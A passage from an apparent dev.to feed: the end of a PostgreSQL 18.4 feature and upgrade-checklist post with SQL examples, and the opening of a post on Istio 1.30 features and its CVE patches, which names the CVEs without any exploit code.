&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="c1"&gt;-- Use uuidv7() as a PK default in PostgreSQL 18&lt;/span&gt;
&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;TABLE&lt;/span&gt; &lt;span class="n"&gt;orders&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;
  &lt;span class="n"&gt;id&lt;/span&gt;          &lt;span class="n"&gt;UUID&lt;/span&gt; &lt;span class="k"&gt;PRIMARY&lt;/span&gt; &lt;span class="k"&gt;KEY&lt;/span&gt; &lt;span class="k"&gt;DEFAULT&lt;/span&gt; &lt;span class="n"&gt;uuidv7&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt;   &lt;span class="c1"&gt;-- ← 18 new&lt;/span&gt;
  &lt;span class="n"&gt;customer_id&lt;/span&gt; &lt;span class="nb"&gt;BIGINT&lt;/span&gt; &lt;span class="k"&gt;NOT&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="n"&gt;amount&lt;/span&gt;      &lt;span class="nb"&gt;NUMERIC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;12&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;NOT&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="n"&gt;created_at&lt;/span&gt;  &lt;span class="n"&gt;TIMESTAMPTZ&lt;/span&gt; &lt;span class="k"&gt;NOT&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt; &lt;span class="k"&gt;DEFAULT&lt;/span&gt; &lt;span class="n"&gt;now&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="c1"&gt;-- Extract the embedded timestamp from a UUIDv7&lt;/span&gt;
&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
       &lt;span class="n"&gt;uuid_extract_timestamp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt; &lt;span class="n"&gt;embedded_ts&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
       &lt;span class="n"&gt;created_at&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
       &lt;span class="n"&gt;uuid_extract_timestamp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="n"&gt;created_at&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt; &lt;span class="n"&gt;skew&lt;/span&gt;
&lt;span class="k"&gt;FROM&lt;/span&gt;   &lt;span class="n"&gt;orders&lt;/span&gt;
&lt;span class="k"&gt;ORDER&lt;/span&gt;  &lt;span class="k"&gt;BY&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt; &lt;span class="k"&gt;DESC&lt;/span&gt;
&lt;span class="k"&gt;LIMIT&lt;/span&gt;  &lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="c1"&gt;-- A schema pattern using uuidv7() to drop a redundant 'now()' column:&lt;/span&gt;
&lt;span class="c1"&gt;-- you can extract the timestamp from id itself, so created_at can be omitted.&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Caveat: &lt;code&gt;uuidv7()&lt;/code&gt; is &lt;strong&gt;approximately sorted&lt;/strong&gt;, not strictly. UUIDs issued in the same millisecond are differentiated only by their random suffix, so high-throughput workloads still see some page fragmentation. Still, index cache hit rates typically improve by 10–30 percentage points over UUIDv4.&lt;/p&gt;

&lt;h2&gt;
  
  
  6. Virtual Generated Columns — Computed Columns as the New Default
&lt;/h2&gt;

&lt;p&gt;PostgreSQL 12 introduced &lt;em&gt;stored&lt;/em&gt; generated columns that materialize values on disk. 18 adds &lt;strong&gt;virtual generated columns&lt;/strong&gt; and &lt;strong&gt;makes virtual the default&lt;/strong&gt;. Virtual columns compute at query time, so they don't take disk space, and changing the expression doesn't trigger a table rewrite.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="c1"&gt;-- In 18, GENERATED ALWAYS AS ... VIRTUAL is the default&lt;/span&gt;
&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;TABLE&lt;/span&gt; &lt;span class="n"&gt;invoices&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;
  &lt;span class="n"&gt;id&lt;/span&gt;           &lt;span class="n"&gt;UUID&lt;/span&gt; &lt;span class="k"&gt;PRIMARY&lt;/span&gt; &lt;span class="k"&gt;KEY&lt;/span&gt; &lt;span class="k"&gt;DEFAULT&lt;/span&gt; &lt;span class="n"&gt;uuidv7&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt;
  &lt;span class="n"&gt;subtotal&lt;/span&gt;     &lt;span class="nb"&gt;NUMERIC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;12&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;NOT&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="n"&gt;tax_rate&lt;/span&gt;     &lt;span class="nb"&gt;NUMERIC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;  &lt;span class="k"&gt;NOT&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt; &lt;span class="k"&gt;DEFAULT&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="mi"&gt;10&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="c1"&gt;-- VIRTUAL is implicit, keyword optional&lt;/span&gt;
  &lt;span class="n"&gt;total&lt;/span&gt;        &lt;span class="nb"&gt;NUMERIC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;12&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;GENERATED&lt;/span&gt; &lt;span class="n"&gt;ALWAYS&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;subtotal&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;tax_rate&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="n"&gt;STORED&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="c1"&gt;-- ← STORED explicit&lt;/span&gt;
  &lt;span class="n"&gt;total_v&lt;/span&gt;      &lt;span class="nb"&gt;NUMERIC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;12&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;GENERATED&lt;/span&gt; &lt;span class="n"&gt;ALWAYS&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;subtotal&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;tax_rate&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;         &lt;span class="c1"&gt;-- ← VIRTUAL default&lt;/span&gt;
&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="c1"&gt;-- STORED vs VIRTUAL: only STORED can be indexed today&lt;/span&gt;
&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;INDEX&lt;/span&gt; &lt;span class="n"&gt;idx_invoices_total&lt;/span&gt; &lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="n"&gt;invoices&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;total&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="c1"&gt;-- VIRTUAL: not indexable in 18 (under review for 19)&lt;/span&gt;
&lt;span class="c1"&gt;-- If you need an index, declare STORED explicitly.&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  7. Temporal Constraints — WITHOUT OVERLAPS and PERIOD
&lt;/h2&gt;

&lt;p&gt;PostgreSQL 18 brings SQL-standard &lt;strong&gt;temporal constraints&lt;/strong&gt; for data that has a time dimension: hotel reservations, employee tenure periods, contract validity windows.&lt;/p&gt;

&lt;h3&gt;
  
  
  7.1 WITHOUT OVERLAPS — Period Non-Overlap
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="c1"&gt;-- Hotel reservation: bookings for the same room must not overlap in time&lt;/span&gt;
&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;TABLE&lt;/span&gt; &lt;span class="n"&gt;reservations&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;
  &lt;span class="n"&gt;room_id&lt;/span&gt;    &lt;span class="nb"&gt;INT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="n"&gt;period&lt;/span&gt;     &lt;span class="n"&gt;daterange&lt;/span&gt; &lt;span class="k"&gt;NOT&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="n"&gt;guest_name&lt;/span&gt; &lt;span class="nb"&gt;TEXT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="c1"&gt;-- 18 new: WITHOUT OVERLAPS on the period column&lt;/span&gt;
  &lt;span class="k"&gt;PRIMARY&lt;/span&gt; &lt;span class="k"&gt;KEY&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;room_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;period&lt;/span&gt; &lt;span class="k"&gt;WITHOUT&lt;/span&gt; &lt;span class="k"&gt;OVERLAPS&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="c1"&gt;-- Overlapping attempt — previously required a custom trigger&lt;/span&gt;
&lt;span class="k"&gt;INSERT&lt;/span&gt; &lt;span class="k"&gt;INTO&lt;/span&gt; &lt;span class="n"&gt;reservations&lt;/span&gt; &lt;span class="k"&gt;VALUES&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;101&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;daterange&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'2026-06-01'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s1"&gt;'2026-06-05'&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="s1"&gt;'Alice'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="k"&gt;INSERT&lt;/span&gt; &lt;span class="k"&gt;INTO&lt;/span&gt; &lt;span class="n"&gt;reservations&lt;/span&gt; &lt;span class="k"&gt;VALUES&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;101&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;daterange&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'2026-06-03'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s1"&gt;'2026-06-07'&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="s1"&gt;'Bob'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="c1"&gt;-- ERROR: conflicting key value violates exclusion constraint "reservations_pkey"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  7.2 PERIOD — Temporal Foreign Key
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="c1"&gt;-- Employee tenure: each employee's dept_id must reference a valid department&lt;/span&gt;
&lt;span class="c1"&gt;-- whose period contains the employee period.&lt;/span&gt;
&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;TABLE&lt;/span&gt; &lt;span class="n"&gt;departments&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;
  &lt;span class="n"&gt;dept_id&lt;/span&gt;   &lt;span class="nb"&gt;INT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="n"&gt;period&lt;/span&gt;    &lt;span class="n"&gt;daterange&lt;/span&gt; &lt;span class="k"&gt;NOT&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="n"&gt;dept_name&lt;/span&gt; &lt;span class="nb"&gt;TEXT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="k"&gt;PRIMARY&lt;/span&gt; &lt;span class="k"&gt;KEY&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;dept_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;period&lt;/span&gt; &lt;span class="k"&gt;WITHOUT&lt;/span&gt; &lt;span class="k"&gt;OVERLAPS&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;TABLE&lt;/span&gt; &lt;span class="n"&gt;employee_history&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;
  &lt;span class="n"&gt;emp_id&lt;/span&gt;    &lt;span class="nb"&gt;INT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="n"&gt;period&lt;/span&gt;    &lt;span class="n"&gt;daterange&lt;/span&gt; &lt;span class="k"&gt;NOT&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="n"&gt;dept_id&lt;/span&gt;   &lt;span class="nb"&gt;INT&lt;/span&gt; &lt;span class="k"&gt;NOT&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="k"&gt;PRIMARY&lt;/span&gt; &lt;span class="k"&gt;KEY&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;emp_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;period&lt;/span&gt; &lt;span class="k"&gt;WITHOUT&lt;/span&gt; &lt;span class="k"&gt;OVERLAPS&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
  &lt;span class="c1"&gt;-- 18 new: temporal foreign key using PERIOD&lt;/span&gt;
  &lt;span class="k"&gt;FOREIGN&lt;/span&gt; &lt;span class="k"&gt;KEY&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;dept_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;PERIOD&lt;/span&gt; &lt;span class="n"&gt;period&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;REFERENCES&lt;/span&gt; &lt;span class="n"&gt;departments&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;dept_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;PERIOD&lt;/span&gt; &lt;span class="n"&gt;period&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="c1"&gt;-- ⚠️ note: temporal FKs do not yet support RESTRICT / CASCADE /&lt;/span&gt;
&lt;span class="c1"&gt;-- SET NULL / SET DEFAULT on ON DELETE or ON UPDATE — only NO ACTION&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Implementation detail: temporal constraints use GiST indexes internally, so they're larger than B-Tree indexes. And because ON DELETE/UPDATE actions are limited, treat temporal FK enforcement as &lt;em&gt;"partially restricted relative to the SQL standard"&lt;/em&gt; when adopting them.&lt;/p&gt;

&lt;h2&gt;
  
  
  8. ManoIT Internal Cluster Verification Checklist
&lt;/h2&gt;

&lt;p&gt;The 12-step sequence ManoIT applied to internal RDS PostgreSQL 18 (18.1 → 18.4) plus on-prem 18 clusters, alongside the io_method transition and OAuth rollout:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Step&lt;/th&gt;
&lt;th&gt;Target&lt;/th&gt;
&lt;th&gt;Verification Command / Action&lt;/th&gt;
&lt;th&gt;Expected Outcome&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;refint triggers&lt;/td&gt;
&lt;td&gt;Run the SQL from §2.1&lt;/td&gt;
&lt;td&gt;0 rows expected; if any, migrate immediately&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;MD5 users&lt;/td&gt;
&lt;td&gt;Run the SQL from §2.2&lt;/td&gt;
&lt;td&gt;All should be scram-sha-256&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;SSL/GSS exposure&lt;/td&gt;
&lt;td&gt;Review &lt;code&gt;hostssl&lt;/code&gt; / &lt;code&gt;hostgssenc&lt;/code&gt; CIDRs in &lt;code&gt;pg_hba.conf&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;No internet-wide (0.0.0.0/0) rules&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Logical replication owner&lt;/td&gt;
&lt;td&gt;&lt;code&gt;SELECT subname, subowner::regrole FROM pg_subscription;&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Confirm subscriber owners are known roles&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Apply 18.4 patch&lt;/td&gt;
&lt;td&gt;RDS: in-place minor upgrade to 18.4 during maintenance window; on-prem: &lt;code&gt;apt install postgresql-18=18.4-1&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Confirm version 18.4, all extensions compatible&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;io_method&lt;/code&gt; transition&lt;/td&gt;
&lt;td&gt;Keep &lt;code&gt;worker&lt;/code&gt; or switch to &lt;code&gt;io_uring&lt;/code&gt; (kernel 5.1+)&lt;/td&gt;
&lt;td&gt;Increased dispatch counts in &lt;code&gt;pg_stat_io&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;OAuth pg_hba.conf&lt;/td&gt;
&lt;td&gt;Apply §4.1–4.3 and &lt;code&gt;pg_reload_conf()&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Keep scram-sha-256 line for emergency access&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;Adopt uuidv7()&lt;/td&gt;
&lt;td&gt;Change new tables' PK to &lt;code&gt;DEFAULT uuidv7()&lt;/code&gt;; existing tables go dual-column&lt;/td&gt;
&lt;td&gt;Watch index cache hit rate&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;Virtual Generated Columns&lt;/td&gt;
&lt;td&gt;Only keep STORED where indexes are required&lt;/td&gt;
&lt;td&gt;Confirm table size decrease&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;10&lt;/td&gt;
&lt;td&gt;Temporal Constraints PoC&lt;/td&gt;
&lt;td&gt;Adopt &lt;code&gt;WITHOUT OVERLAPS&lt;/code&gt; in reservation/contract domains&lt;/td&gt;
&lt;td&gt;Unit-test rejecting overlapping INSERTs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;Standby replication&lt;/td&gt;
&lt;td&gt;Patch streaming replicas to 18.4, monitor lag&lt;/td&gt;
&lt;td&gt;Lag returns to &amp;lt;1s&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;12&lt;/td&gt;
&lt;td&gt;Rollback plan&lt;/td&gt;
&lt;td&gt;18.4 → 18.3 downgrade is unsupported → verify base-backup restore plan&lt;/td&gt;
&lt;td&gt;Confirm 30-day PITR window&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  9. Closing — The New Defaults 18.4 Sets
&lt;/h2&gt;

&lt;p&gt;PostgreSQL 18.4 is a release where &lt;strong&gt;"major security patches and the future authentication / identification / temporal model both arrive in stable form"&lt;/strong&gt;. Among the 11 CVEs, the &lt;code&gt;refint&lt;/code&gt; RCE (&lt;code&gt;CVE-2026-6637&lt;/code&gt;), the SSL/GSS DoS (&lt;code&gt;CVE-2026-6479&lt;/code&gt;), and the logical-replication SQL injection (&lt;code&gt;CVE-2026-6476&lt;/code&gt;) demand patching &lt;em&gt;now&lt;/em&gt;. The major-18 features — &lt;code&gt;io_method=worker&lt;/code&gt; (default) → &lt;code&gt;io_uring&lt;/code&gt; (Linux 5.1+), native OAuth 2.0, &lt;code&gt;uuidv7()&lt;/code&gt;, Virtual Generated Columns, Temporal Constraints — are now the starting point for &lt;em&gt;2026 H2 new schemas&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;ManoIT's recommended operational sequence: (1) apply the security patches across every supported track (14.23, 15.18, 16.14, 17.10, 18.4) within seven days; (2) audit and remove the three risk patterns — &lt;code&gt;refint&lt;/code&gt;, MD5 authentication, unrestricted SSL/GSS exposure; (3) keep &lt;code&gt;io_method=worker&lt;/code&gt; as a baseline and switch to &lt;code&gt;io_uring&lt;/code&gt; on Linux 5.1+ workloads; (4) design new services starting with OAuth 2.0 authentication + &lt;code&gt;uuidv7()&lt;/code&gt; + Virtual Generated Columns; (5) introduce &lt;code&gt;WITHOUT OVERLAPS&lt;/code&gt; and &lt;code&gt;PERIOD&lt;/code&gt; for reservation, contract, and history tables where the time dimension matters. The database is no longer "an engine that runs SQL" — it's now an &lt;strong&gt;enterprise security control point that standardizes authentication, identification, the time dimension, and the I/O model together&lt;/strong&gt;.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This post was co-authored by Anthropic Claude (Opus 4.6) and the ManoIT engineering team. PostgreSQL 18.4 release notes and security advisories from postgresql.org are primary sources. ManoIT internal verification results are provided as reference and should not be generalized. Please credit the source when citing or republishing.&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://www.manoit.co.kr/forum/view/1476091" rel="noopener noreferrer"&gt;ManoIT Tech Blog&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>postgres</category>
      <category>database</category>
      <category>security</category>
      <category>backend</category>
    </item>
    <item>
      <title>Istio 1.30 Deep Dive — Agentgateway, Ambient Multicluster, TrafficExtension API, and 4 CVE Patches (JWKS RSA Leak, XDS Debug Auth)</title>
      <dc:creator>daniel jeong</dc:creator>
      <pubDate>Thu, 21 May 2026 00:21:58 +0000</pubDate>
      <link>https://dev.to/x4nent/istio-130-deep-dive-agentgateway-ambient-multicluster-trafficextension-api-and-4-cve-patches-431d</link>
      <guid>https://dev.to/x4nent/istio-130-deep-dive-agentgateway-ambient-multicluster-trafficextension-api-and-4-cve-patches-431d</guid>
      <description>&lt;h1&gt;
  
  
  Istio 1.30 Deep Dive — Agentgateway, Ambient Multicluster, TrafficExtension API, and 4 CVE Patches (JWKS RSA Leak, XDS Debug Auth)
&lt;/h1&gt;

&lt;p&gt;On May 18, 2026, the Istio community shipped &lt;strong&gt;Istio 1.30.0&lt;/strong&gt; alongside backports 1.29.3 and 1.28.7. On the surface it's a regular quarterly release, but the content is roughly double the normal scope. First, &lt;strong&gt;Agentgateway&lt;/strong&gt; — a new Gateway API data-plane proxy built for AI agent and MCP server traffic — is wired in as an experimental &lt;code&gt;GatewayClass&lt;/code&gt;, replacing Envoy on the gateway pod when enabled. Second, &lt;strong&gt;Ambient mode&lt;/strong&gt; finally crosses an operability threshold with CIDR &lt;code&gt;ServiceEntry&lt;/code&gt;, optional XFCC synthesis at waypoints, configurable HBONE window sizing, and Tokio runtime metrics in ztunnel. Third, the new &lt;strong&gt;&lt;code&gt;TrafficExtension&lt;/code&gt; API&lt;/strong&gt; lands as a unified replacement for &lt;code&gt;WasmPlugin&lt;/code&gt;, consolidating Wasm and Lua extensibility behind a single resource that applies to sidecars, gateways, and waypoints. And decisively — &lt;strong&gt;four security advisories are patched together&lt;/strong&gt;: &lt;code&gt;CVE-2026-31837&lt;/code&gt; (JWKS fallback leaks an RSA private key, enabling JWT forgery), &lt;code&gt;CVE-2026-31838&lt;/code&gt; (XDS debug endpoints on plaintext port 15010 reachable without authentication), &lt;code&gt;CVE-2026-39350&lt;/code&gt; (regex metacharacters in &lt;code&gt;AuthorizationPolicy&lt;/code&gt; SPIFFE/namespace fields are not escaped), and &lt;code&gt;CVE-2026-41413&lt;/code&gt; (JWKS URI CIDR blocking is bypassed via DNS redirects and issuer discovery). This article decomposes the 1.29 → 1.30 breaking changes — XDS debug auth becoming mandatory, CNI config permissions tightening to 0600, and the sidecar service-namespace selection order flipping from alphabetical to "Kubernetes Service first" — across the five components that matter (ztunnel, waypoint, CNI, istiod, istioctl), and walks through the upgrade checklist we ran on a lab cluster (EKS 1.33 + Ambient + multi-network).&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Why May 18, 2026 is a turning point for service mesh
&lt;/h2&gt;

&lt;p&gt;Istio promoted Ambient mode to beta in 1.24 (2024) and graduated Ambient Multicluster to alpha in late 2025. At KubeCon EU 2026, CNCF framed Istio as a "future-ready service mesh for the AI era" — the three flagship items from that announcement (&lt;code&gt;InferencePool&lt;/code&gt; v1, Ambient multi-network waypoint routing, the Agentgateway data plane) all land in this 1.30 release as either GA or experimental features. 1.30 matters because three independent tracks arrive at the same time.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Date&lt;/th&gt;
&lt;th&gt;Release / Event&lt;/th&gt;
&lt;th&gt;Operational impact&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;2025.11.05&lt;/td&gt;
&lt;td&gt;Istio 1.28.0 — Ambient Multicluster alpha, nftables, &lt;code&gt;InferencePool&lt;/code&gt; v1&lt;/td&gt;
&lt;td&gt;Multi-network waypoint routing introduced&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.02&lt;/td&gt;
&lt;td&gt;Istio 1.29.0 — TrafficExtension API early scaffolding&lt;/td&gt;
&lt;td&gt;WasmPlugin replacement work begins&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.03.25&lt;/td&gt;
&lt;td&gt;CNCF "Future-Ready Service Mesh" announcement (KubeCon EU)&lt;/td&gt;
&lt;td&gt;Ambient Multicluster + Inference Extension + Agentgateway roadmap&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.04&lt;/td&gt;
&lt;td&gt;Cilium Tetragon 1.4 + Cilium 1.18 stabilizing&lt;/td&gt;
